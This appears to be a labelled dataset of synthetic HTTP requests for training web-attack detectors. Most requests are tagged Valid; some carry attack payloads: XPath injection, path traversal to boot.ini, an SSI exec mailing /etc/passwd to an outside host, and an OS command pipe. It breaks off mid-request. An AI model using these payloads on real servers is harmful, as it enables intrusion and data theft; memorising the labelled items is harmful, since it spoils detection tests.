Warning: 922 172.195.36.87 "f6tmena1" "Fri, 19 Dec 08 22:12:57 CET"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30090
Start - Id: 49067
class: XPathInjection
GET /oJ/jAggAopen/opJku26VWg6qZUB3__B-/vaI/kA8vwm@cinCnK.xcx/Aatle9f/ieN9kctr5Nec8cnebkn.asp?ca4sjfitjyttobk=rc%7EhebitSma&YN1UnQmf=ws3hm4Z%3Dnmuewinnt&5etoeoovsila=1867+or+++++er9Ie%2Foemf%2Foeo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D86%5D+++++or+3%3D&rauNonN=9065 HTTP/1.0
Host: www.aiau.de:80
Connection: keep-alive
Accept: audio/*, text/plain
Accept-Charset: windows-1250;q=0.2, iso-8859-4;q=0.3
Accept-Encoding: identity;q=0.4, identity;q=0.7, compress
Accept-Language: ha-k, pl1e-rataaf;q=0.2, yr-o;q=0.5, bqEnetyu-d9pamfe;q=0.5
Cache-Control: no-store
Client-ip: 164.173.183.167
Cookie: 6ynto3d4=W l-eN;g8NaG_fFWand0@=nrudnoon;dYPKU=%e'%=roteia t gqniwp-;awnno=258584
Cookie2: $Version="84"
Date: Thu, 20 Mar 08 02:50:49 UTC
ETag: "91bonU_8hX5Lp8pQC"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Sat, 10 Apr 04 06:18:55 CET
If-Unmodified-Since: Thu, 04 Jan 07 22:30:31 UTC
If-Match: "sStgjOQPpH2mAv."
If-None-Match: "kwRLY.zZRgHhQvxgSb"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 416
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: Digest uri=/1zdA/gs0fkh1l.asp
Range: -4,-1070,-459610
Referer: http://0esd.it/we10Ke.exe
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: beqefoas/9.8.0
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: FTP/8.8 www.iuates.htm, HTTP/9.3 243.159.36.87:4755
Transfer-Encoding: 46Gbd
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49067
Start - Id: 45589
class: PathTransversal
GET /cEN/FEUP7BR8I1/y2-sCctCAD/mEutbcIpdaoi/eebornr3catme2y/Deo/lGxITo3VUw8mYvSgMs/cbqsRethitFsaelisus/aq.htm?rExv.wE1=o%3A%5Cwinnt%5Cboot.ini&e3f=aol5yIapn&LrinxIsmohfo=finput%2Fn33xfuc1tid&iseo2oaL9e=29395&5etmyXhItrhhag=yq&iooqescqnie=resuEu&meaoftoqmFbtoee=rs&fggleseEE5=+0awp-nifwdH%25ueno8Ldu&tzdnull4xdocumentJet4img=84 HTTP/1.1
Host: www.0sit.gov:80
Connection: lsHsmU
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: hmria-4S;q=0.4, ddhd0eeo-dso, s-o, WuJltex-BeyxsOiy;q=0.0, tlhhi-nlxyb
Cache-Control: max-stale
Client-ip: 133.101.53.197
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Fri, 12 Aug 05 01:19:46 CET
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: we9ro
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Mon, 25 Aug 08 12:09:23 CET
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: "q4t7QLLup-X_Lvm"
If-None-Match: *
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 823
MIME-Version: 8.1
Pragma: eedti=wftdA
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: http://ru9fkA.ch/febems9/rel7/qnotba/asdponh.tiff
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 8.2; 0W-ss; rv:9.9.1) Gecko/40054283
UA-CPU: StrongARM
UA-Disp: 911,8166,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 9.0 www.Usne0nrh.html
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 59418897885671508932
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45589
Start - Id: 22907
class: Valid
GET /vtodoWi1RPho/BZOgxUlchildS/aPwBypAmaH4wmsMn416/zoSxN3@Y2/dceyo7/f5bCeGu8D7-V/gm/revsceba6Uyttj/ziraoo5ci.tiff?snabet3=60804&unh=6091&WDS5=603895&tola=gzA%40pKeGN&J1rhDl6PBI=7&bwbjuofEsR=iOiaiOav&wbeet=Mn&Daurterna=i%27tfhln4e+9+&gR3rtlwntea=04014 HTTP/1.1
Host: www.ttchma.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: okethp='oin4d5'
Client-ip: 238.41.42.217
Cookie: group bySNDRmxp_b=tDty94t8sG6
Cookie2: $Version="4"
Date: Sat, 16 Aug 08 13:04:35 UTC
ETag: "vqarwC2dO-izWdxNr"
Expect: 100-continue
From: 8dmmAuhr@htieh.gov
If-Modified-Since: Sat, 24 Nov 07 07:04:24 CET
If-Unmodified-Since: Tue, 30 Dec 08 07:26:48 CET
If-Match: "EfY45aO6poCDhibFwj"
If-None-Match: "waRw89txpotCSA1CkpEM"
If-Range: Fri, 29 Sep 06 18:05:34 UTC
Max-Forwards: 44
MIME-Version: 7.2
Pragma: dflfuMs='hhh'
Proxy-Authorization: Basic c3RDZWVvbDpvbmxUYWF5
Authorization: Basic c3BhbjpOU3N6dFFs
Range: -6039,4724-
Referer: /Rw6s5rl/eSxl3/e3yme32.css
TE: deflate;q=0.6,gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.0 (compatible; Konqueror/7.6; Win98; geoed; hcn4r)
UA-CPU: x86
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: HTTP/5.4 www.ueeEamto.png, 5.0 www.Frclp.jpeg, 8.9 www.c5oie.htm
Transfer-Encoding: compress
Upgrade: oua/3.4, otefro/7.9, jrsm/7.4, wttl2/5.4
Warning: 383 www.enRF.jpeg "I3teed" 
X-Forwarded-For: 26.249.21.162
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22907
Start - Id: 13463
class: Valid
GET /letct6tatB0ri2m/betweencMx@PoryLJdrop5B/ee6AsleaO4neh8e4e/2idi1okpingibsgt/oqzVOoaB/ehto41zl5r/A3@T6/s1.asmx?W79Wu-Ao=pmwsYxmto7&nchdageaues=etie0alaoimgn%7Em&m9dw=81884&u2bdetdicozc=5264 HTTP/1.1
Host: 134.205.248.242
Connection: close
Accept: text/html;q=0.3
Accept-Charset: euc-kr;q=0.3, x-mac-japanese, x-mac-chinesetrad, koi8;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: h-soztnr;q=0.4, 53aEhOe-ncifs, ecs5O-h, tIg-tSndXxiy
Cache-Control: only-if-cached
Client-ip: 77.2.98.209
Cookie: rgacwhdtykyrrn0=twdloo4hs;oe=e ;ndhsrd1ae=l9slogepdshis ;fhghotrOCi=03497631
Cookie2: $Version="7"
Date: Sat, 05 Aug 06 07:49:51 CET
ETag: W/"9cClyJiotc2LukdJQ6R"
Expect: jo5am=rShvn;aptesIgs=saftiid
From: ahyni5@nu8Ltehais.it
If-Modified-Since: Sat, 12 Mar 05 21:40:03 CET
If-Unmodified-Since: Wed, 17 Jun 09 22:17:35 GMT
If-Match: "xES7iJWyUBSpeBH"
If-None-Match: *
If-Range: Sun, 02 Nov 08 01:03:31 UTC
Max-Forwards: 27
MIME-Version: 0.5
Pragma: 1=nt
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: Basic bzVlTzpzcXl0ZXU4dg==
Range: -258637,-88,5-
Referer: http://sloeenb.org/aow1xod/SeEew4b/mdpibe/dNeOlez/nhthmasj.aspx
TE: trailers,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/0.4 (compatible; MSIE 6.2; Win98; ntintalEh; 4neFt)
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 188x166
Via: 0.1 173.32.74.59
Transfer-Encoding: gzip
Upgrade: bO6/2.7, oawf6h/2.0
Warning: 403 www.ameiXrAq.jpg:50 "inohizhcts2llsj" "Mon, 19 Jun 06 02:09:24 GMT"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 78603902912027732
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13463
Start - Id: 11875
class: Valid
GET /l3BJpdawXE5h8U/tJ6R_/aJ/owlO1Kb5c/rw5Gr-M6Nd2KepQnnup/imgsMJ5rTui/tgardeTvsatdeeoHn/itehwtyphlsrxidyes/1w.6d/3iese.shtml?jTheae2h=oysYu&5udtned0nxilra=a%7E9%27eDetn&hVLm=tu58hC.EANw8&odl0ahr=aZxJk8&_XTYlxm=4967&apmrviadnahd=etz HTTP/1.0
Host: 208.116.164.154
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-6, x-mac-arabic, gb2312;q=0.6
Accept-Encoding: identity;q=0.7
Accept-Language: T-te3ai, etovkray-f6, reaeed-sa6
Cache-Control: only-if-cached
Client-ip: 253.123.138.51
Cookie: n9bIk=7015219;kLls3lU=712;mneonwgnaohj=5ekp2y1
Cookie2: $Version="549"
Date: Wed, 17 Feb 10 24:00:48 CET
ETag: "legimXkD5odU3MO1."
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Thu, 08 Oct 09 05:16:15 CET
If-Unmodified-Since: Wed, 23 Jan 08 10:11:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4074
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bmtOZDo0ZTVp
Authorization: Basic aXVoY21vUjpiNHZk
Range: -35,-883,-072
Referer: http://www.AtzdrMMa.org/nt4aCiE/nogI/ofdih2oi.sh
TE: trailers
Trailer: Pragma
User-Agent: Kcit/4.9
UA-CPU: PowerPC
UA-Disp: 529,350,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 872x2543
Via: HTTP/0.9 191.228.120.118, agt/8.1 www.1rax.tiff, 6.4 www.2ebo4tdh.css:37889
Transfer-Encoding: deflate
Upgrade: 6tBb5/8.0, exe/8.3
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 02595980702101510
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11875
Start - Id: 21076
class: Valid
GET /tlobzZ-ky/badminVoR_xP.QlPC/rfa036-8hqFA5Zd7r/arkL95bh.gI-/ZUjW_ghtaccesmQFbu/eF9EykIW1Pp0RB4UW9s7/edgSto8sreTf/hDUCcI-d/dWw/es4tengiihciqu3H/xoscriptm/eU7SEqF2F4.Zv.q.css?ukao=emee2ttn&6nead=i2pnhe&Wy0G=aeol&emawsuDha=4 HTTP/1.1
Host: 255.41.188.44
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-3;q=0.2, euc-tw;q=0.4, iso-8859-2;q=0.7
Accept-Encoding: compress, gzip, identity;q=0.2, compress;q=0.6, identity;q=0.4
Accept-Language: *
Cache-Control: max-age=16
Client-ip: 238.193.48.102
Cookie: sn=lo/pradZtalwjimehrU;ctoozh=zt0)i7g~5sa7;abqdeaetvnogt=797NA_bd2nhz;sykobsovIeti=1811
Cookie2: $Version="968"
Date: Fri, 13 Mar 09 10:16:03 UTC
ETag: "9IxDM2DgpMQu2_MI4@"
Expect: 100-continue
From: TcuGd@oto9w.com
If-Modified-Since: Wed, 03 Jan 07 03:50:13 GMT
If-Unmodified-Since: Mon, 20 Jul 09 14:59:07 GMT
If-Match: "QPi7aJXcwROyYcbmO"
If-None-Match: *
If-Range: *
Max-Forwards: 32
MIME-Version: 9.2
Pragma: dAi9l=2t
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest opaque="fo6npbr6"
Range: 966923-49277,-9,672714-
Referer: /ejhOtfwy/8eHaer.pdf
TE: trailers,chunked;q=0.9
Trailer: TE
User-Agent: Mozilla/0.7 (compatible; estevhnob; Windows NT; njsGw)
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 523x776
Via: HTTP/1.7 80.57.159.212
Transfer-Encoding: deflate
Upgrade: 7ynff/7.0
Warning: 713 12.247.43.52:5198 "etwniheaEussemp7n" "Tue, 07 Sep 04 10:12:42 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21076
Start - Id: 10482
class: Valid
GET /alocgrfeoosuA/rn3_fFXIm3KdTxuKy/scbZX/dMx5B3PxctNBGDhZF/EG172W34JkY/sn58/6DrveeFAinHqc/2locationd.jpeg?xa3grssh=9%7Cfnaie&dq8a4oc=nt&ePsun7A=ev4erutpish&aadnn=tV4&fhduCtt3mh=662&raAdosstzr=02518&RgMh=+%40diesw&.e49V=ciaane2neaakcdr&w3mtq=ahmnnhcl59w&ctebt=rr%26e&ay=+e+5%29n%29bi&ayso=iyKb4zzP&9mswl=%28iusr%5D+nwlt&iafi9ensji4=5386446 HTTP/1.1
Host: www.l2haerttoh.org
Connection: keep-alive
Accept: text/*;q=0.9, text/*, video/mpeg;q=0.1
Accept-Charset: windows-874, iso-8859-5
Accept-Encoding: compress, deflate, gzip;q=0.6, gzip;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 234.79.172.175
Cookie: .FS8gSR2r=oeI5hph~dsene;otjw0hb=117;YZzAhf=61;blruhvcv=rsYiC1nrBlugnlr
Cookie2: $Version="130"
Date: Thu, 30 Dec 04 04:54:59 UTC
ETag: W/"PmI.NSLS9F8@CFmne2vP"
Expect: Esiude=to7oinyo
From: Tntn@cwaeo7.gov
If-Modified-Since: Tue, 04 Sep 07 22:55:19 GMT
If-Unmodified-Since: Thu, 26 Oct 06 23:07:07 UTC
If-Match: "oJA4RenIUGH9GJ5X_7N-"
If-None-Match: "TdZHNhvwFpp5fhMyHvQu"
If-Range: Sat, 10 Oct 09 09:41:03 UTC
Max-Forwards: 288
MIME-Version: 1.0
Pragma: Teoprcaf=0vwj
Proxy-Authorization: Digest cnonce="os85ul"
Authorization: Basic ZWx2ZDpsbGFlbg==
Range: -19441,204-
Referer: http://www.u8tn2zi.org/Slooe/guyvusrs.png
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 7.0; in-ee; rv:9.8.9) Gecko/24877789
UA-CPU: StrongARM
UA-Disp: 4955,848,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9550x605
Via: hnne1g/1.4 11.187.222.71
Transfer-Encoding: gzip
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 147 www.lrc3.js "UititoIleOediu0h" 
X-Forwarded-For: 123.125.206.4
X-Serial-Number: 2186301943746679
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10482
Start - Id: 40085
class: SSI
GET /tsiieentq0sodRse/wr9crIntiObrdad/nuXmAhc1-Fjvsc@7aelR/Wds7apObBKWk/ds6iexj2tnak2ekhe/iPiA1uU.sh?u8DBc2IchildVh=aLin&Kj61-vEra.winnt7=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fmail+++++yf4Towt.com+++%3C++++%2Fetc%2Fpasswd%22--%3E&el0m=nmd%5Cf&onldnevzoo=a&ff1i=723&ihr=ht&seC6dDbXCWm=3%5CT9wmcmdqda HTTP/1.1
Host: 176.175.105.157
Connection: Ante
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 126.38.105.123
Cookie: tre9a=nhy
Cookie2: $Version="080"
Date: Wed, 18 Aug 04 06:01:49 UTC
ETag: W/"t_9Ac4oG2tQdKAOiS0"
Expect: iotagppj=M2nn;eceo=idattnde
From: eolu8j@aioa.fr
If-Modified-Since: Sun, 23 Aug 09 23:08:47 GMT
If-Unmodified-Since: Thu, 20 Apr 06 20:45:45 CET
If-Match: "xPd-f2EM.rHLxna"
If-None-Match: "3vF7Qe1rCSpHTAbnhyfk"
If-Range: Thu, 14 Sep 06 02:21:09 CET
Max-Forwards: 30
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: NTLM c29kZ2NpaXNhOWVuYmVvcmVpczZ0QmFTc29pcmkxZm9zZXRhdg==
Range: -170
Referer: /E3ocapi/9stmttF/uhutihN.asmx
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: letci/6.1.4.8
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0944x596
Via: 1.8 www.dsrh.tiff, 4.5 112.246.81.153
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40085
Start - Id: 13310
class: Valid
GET /ib8Ai86bj.O7C/42nph-/catleewai3.mdb? HTTP/1.1
Host: 13.165.248.168:74821
Connection: Duwso
Accept: */*
Accept-Charset: koi8;q=0.4, x-mac-greek, iso-8859-7;q=0.1, x-mac-cyrillic
Accept-Encoding: gzip, compress;q=0.7
Accept-Language: r-2vo3ulE, wi5j-jhej;q=0.9, cstHans-eyymST, ce-euuztaec;q=0.0
Cache-Control: no-store
Client-ip: 141.84.147.206
Cookie: as7let2h7omeu=537
Cookie2: $Version="82"
Date: Sun, 04 Jun 06 04:38:48 UTC
ETag: W/"0Lzq@ck1mfrGtJh"
Expect: t5Inns8i=dicfi
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Mon, 12 Jan 04 20:57:08 UTC
If-Unmodified-Since: Wed, 20 Aug 08 21:33:23 CET
If-Match: *
If-None-Match: "jpDVmXxRbj3eGVpN"
If-Range: *
Max-Forwards: 2777
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic aG9vZjp0bzlhZW8=
Authorization: Digest uri=/sa6s/eyhr/soe5gb.jpeg
Range: 85-22
Referer: /trei.tiff
TE: deflate,trailers,deflate;q=0.4
Trailer: TE
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 3.1; al-rc; rv:5.5.9) Gecko/65192021
UA-CPU: Sparc
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1944x150
Via: FTP/0.7 159.127.22.166, sTor/0.6 www.n4n8.css, nsl4/3.2 www.titz.gif:78524
Transfer-Encoding: deflate
Upgrade: cRSP/8.6, no8s/8.1, 7spiw/8.5
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 224.201.232.196
X-Serial-Number: 2177345757
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13310
Start - Id: 44204
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: 249.98.66.48
Connection: close
Accept: image/*;q=0.8, video/*;q=0.7, video/*;q=0.1
Accept-Charset: big5, x-mac-japanese, windows-874
Accept-Encoding: compress, compress
Accept-Language: rnl-Tlspe, cm48I-r;q=0.0
Cache-Control: max-stale
Client-ip: 184.187.134.181
Cookie: mwoZ=ni+&rajieyrconnectbody;SorJ=iAinPs>psscript;xeere=o;21ePq6ye=q)9a
Cookie2: $Version="370"
Date: Sun, 29 Oct 06 20:18:44 UTC
ETag: "wFfcy3k9UPL1p_h.3m"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sun, 26 Nov 06 05:28:15 CET
If-Unmodified-Since: Tue, 11 Nov 08 07:08:30 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Mar 10 01:58:51 CET
Max-Forwards: 7
MIME-Version: 1.8
Pragma: vnxar=smgeaeo
Proxy-Authorization: Digest opaque="o9rzL"
Authorization: 9w0nEe Hqmzed=bebg
Range: 22399-
Referer: http://RatitiKt.be/oeiwhred.php4
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/6.5 (compatible; Esmy; Solaris; iotdsdde)
UA-CPU: PowerPC
UA-Disp: 0876,3818,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: HTTP/8.7 www.1Tto1o.css:96155
Transfer-Encoding: identity
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44204
Start - Id: 34133
class: Valid
PUT /pd3f.Qt62bH-m./mWsc48I_EgE.tCQo/rB/oxstieKCi0zeo2yj/p9ynXG8tEpYH66Q_uFkP/wzinztmpyYftpE/eikaesnecougcl/us/nszweth4rctoSjsisva/f1two5/eiewandryrgset/nkrnaT9oyY86M.shtml? HTTP/1.1
Content-Length: 188
Content-Language: n,yRDipl,N
Content-Encoding: gzip
Content-Location: http://itdfvDou.it/ori85y/l4eEpV/h21cxkhi.exe
Content-MD5: ZW5qRG5zYWV5dzJUdXI5MQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 May 09 20:59:28 UTC
Last-Modified: Tue, 09 Nov 04 19:56:42 UTC
Host: 17.226.20.35:80
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: i7p5o-8O;q=0.2, m-ehr;q=0.2, 0al-efnt, 3dwze8a-rhrOo;q=0.4, dK9fie3-tiauze;q=0.4
Cache-Control: no-store
Client-ip: 3.223.246.13
Cookie: 4eDs=286;Od2RjY.perlcHoa=tuzsR3ElewVfenapu
Cookie2: $Version="8"
Date: Thu, 28 Sep 06 02:53:17 UTC
ETag: W/"0aNHg0TndsCHFbgKT"
Expect: 100-continue
From: scezv@neE4B.fr
If-Modified-Since: Sat, 31 Mar 07 19:19:18 UTC
If-Unmodified-Since: Sun, 19 Mar 06 02:15:09 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Oct 07 01:09:12 UTC
Max-Forwards: 9
MIME-Version: 1.1
Pragma: lao='Aosnhri'
Proxy-Authorization: esNet es3fnhug=nseor
Authorization: NTLM Y2VtMm9maTdoZWxnbmR0cklpbnZuZXR0b2FzY3M2b2VU
Range: -500777,66-
Referer: /ltea/snlSiec3/sawrl/i3r7aSo.zip
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: mG0Gs2jI http://www.rhli.gov
UA-CPU: MIPS
UA-Disp: 654,4575,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 995x590
Via: 2.3 www.aior2u.htm, do1gop/3.7 www.tntr0t.js
Transfer-Encoding: identity
Upgrade: zxilwr/6.9, eWon/2.1
Warning: 295 www.ocnotj.css "efnmenvtT" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gdf=301206&aEautssFus=Hsgbcmssel&rrneaiev8osriaa=2378034122&nt=054659471&dnTctyoazpnVE2=852270&eveegCw=17&gtnng6oh1=Lm&erims@RctaE&NY.IVjQ=mixhlhn3e9ga&AtmsIah0E=adLKMfN&ft=leg1eninzwc

End - Id: 34133
Start - Id: 22968
class: Valid
GET /lyakrU5WrL/ys/r-gs4Y/neokueieuEtc/aEO84fiUPx/jcuuu/SH9BNT3XFinsertsTBt-/uZp8Pvh9/z3.asmx? HTTP/1.0
Host: 204.166.195.79
Connection: keep-alive
Accept: text/xml
Accept-Charset: koi8;q=0.1, windows-1258;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 237.229.255.165
Cookie: sehlu=ai<EtN;9SZGQboC=1540197316
Cookie2: $Version="724"
Date: Sun, 19 Jul 09 06:51:16 UTC
ETag: W/"Ybo7-Iu_ZahsEYGybIT"
Expect: ihhpaeor=1riEn1
From: ap2o@ettoab6r.com
If-Modified-Since: Thu, 13 Oct 05 08:54:23 GMT
If-Unmodified-Since: Sun, 11 Mar 07 21:12:02 CET
If-Match: "643EI@VOJ4NjeCM"
If-None-Match: *
If-Range: Sat, 07 Jan 06 20:18:33 GMT
Max-Forwards: 9929
MIME-Version: 2.8
Pragma: xnStiao2='enopc'
Proxy-Authorization: Basic aGhhcjppZTJp
Authorization: Digest response="A20b0dBe214babFaAC8A4B1A1CfED9A1"
Range: 31732-,84218-
Referer: /eTHaipia/25enrttt/oeudri/rxe3eb.wmn
TE: chunked;q=0.7
Trailer: Pragma
User-Agent: ou1mi/6.8
UA-CPU: x86
UA-Disp: 893,727,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 159x1338
Via: slrc/3.4 www.medi.jpeg:732
Transfer-Encoding: gzip
Upgrade: sisan/8.7, FrNm/6.3, a2dct/4.1, dtwn/4.7
Warning: 438 49.79.91.51:038 "rCeoI3u9lEt" "Sat, 30 Apr 05 03:17:12 GMT"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22968
Start - Id: 4820
class: Valid
POST /3aTHnx/l1vloR1x2/h0xyjzgo0NCOfRY.dll? HTTP/1.1
Content-Length: 38
Content-Language: my6,t
Content-Encoding: compress
Content-Location: http://otyni.st/oqnrynu.mpg
Content-MD5: YWFib2U0bmRlZW45b3ljcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 May 04 10:11:21 GMT
Last-Modified: Wed, 27 Sep 06 24:14:13 UTC
Host: www.fs2hpaelh.cz:0
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.7, deflate, deflate;q=0.6, gzip;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 194.34.112.126
Cookie: 3_gLnulldVcO=okAtuAhwNuni
Cookie2: $Version="858"
Date: Sun, 20 Aug 06 21:42:01 GMT
ETag: W/"jTu04YA@4M7iRMUHTv"
Expect: 100-continue
From: saiEi@tHpsd.it
If-Modified-Since: Thu, 11 Feb 10 17:05:50 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:11:44 CET
If-Match: *
If-None-Match: "@PnsgiRPiIedlEYlE05"
If-Range: Sun, 26 Oct 08 14:08:34 CET
Max-Forwards: 008
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: idrnpn hhmlc=adfer
Authorization: 4m2st0 nmidtign=rsscqt
Range: -04,9209-85523,-968
Referer: /dSfnoiid/aef0cov/o5rmt/nvit/9aep6f.php
TE: trailers,trailers,trailers
Trailer: From
User-Agent: zehtveums
UA-CPU: 68000
UA-Disp: 0621,287,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 904x222
Via: nbAMp/0.2 www.YEtydnyh.html:13, 3.2 www.ca1efte.jpg:8, FTP/6.1 144.72.191.173
Transfer-Encoding: deflate
Upgrade: pltw/8.5, i0og/2.1, mto/5.0, khh/6.6, 54e/7.6
Warning: 620 www.hJaott.htm "tdmceeeioHsslThg" "Wed, 29 Oct 08 06:51:32 GMT"
X-Forwarded-For: 100.9.171.116
X-Serial-Number: 408211072514512
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wEwuPgtRTN=43674&NtbrpetadGbo=12684192

End - Id: 4820
Start - Id: 30686
class: Valid
GET /crAedea/netcatTH9PLY/oMr.sh?woi5f40b=bUS9opejprK&nnuyetlebnou=neek&eg=r-%2Brsth HTTP/1.0
Host: 157.59.105.251
Connection: dshioaDe
Accept: */*
